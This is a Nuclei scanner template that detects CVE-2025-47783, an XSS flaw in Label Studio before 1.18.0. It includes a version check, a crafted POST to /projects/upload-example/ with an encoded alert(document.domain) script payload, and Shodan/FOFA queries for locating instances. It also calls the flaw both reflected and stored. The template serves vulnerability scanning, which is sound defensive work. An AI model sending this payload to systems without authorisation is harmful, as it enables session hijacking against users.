id: CVE-2025-47783 info: name: Label Studio < 1.18.0 - Reflected XSS author: 0x_Akoko severity: medium description: | Label Studio < 1.18.0 contains a stored XSS caused by improper sanitization in POST /projects/upload-example/ endpoint, letting attackers inject malicious scripts to hijack sessions and perform unauthorized actions, exploit requires sending crafted requests. impact: | Attackers can hijack user sessions, steal data, and perform unauthorized actions via injected scripts. remediation: | Upgrade to version 1.18.0 or later. reference: - https://github.com/HumanSignal/label-studio/security/advisories/GHSA-8jhr-wpcm-hh4h classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-79 metadata: verified: true max-request: 2 vendor: humansignal product: label-studio shodan-query: title:"Label Studio" fofa-query: title="Label Studio" tags: label-studio,xss,reflected flow: http(1) && http(2) http: - raw: - | GET /version HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "label-studio")' - 'compare_versions(lsversion, "< 1.18.0")' condition: and internal: true extractors: - type: regex name: lsversion part: body regex: - '"release":\s*"([0-9]+\.[0-9]+(?:\.[0-9]+)?)' group: 1 internal: true - raw: - | POST /projects/upload-example/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded label_config=%3cView%3e%3cText%20name%3d%22text%22%20value%3d%22%24textjmwwi%26lt%3bscript%26gt%3balert(document.domain)%26lt%3b%2fscript%26gt%3bs8m37%22%2f%3e%3c%2fView%3e matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4a0a00473045022059e7488726a01078b95911794f3531c6dc025cdeee18ef73cfd45eee1fd780620221008d944d3b2f8b2027595e8fad74c7c9c05ad0868d4bf92497c6e4424914e817cc:922c64590222798bb761d5b6d8e72950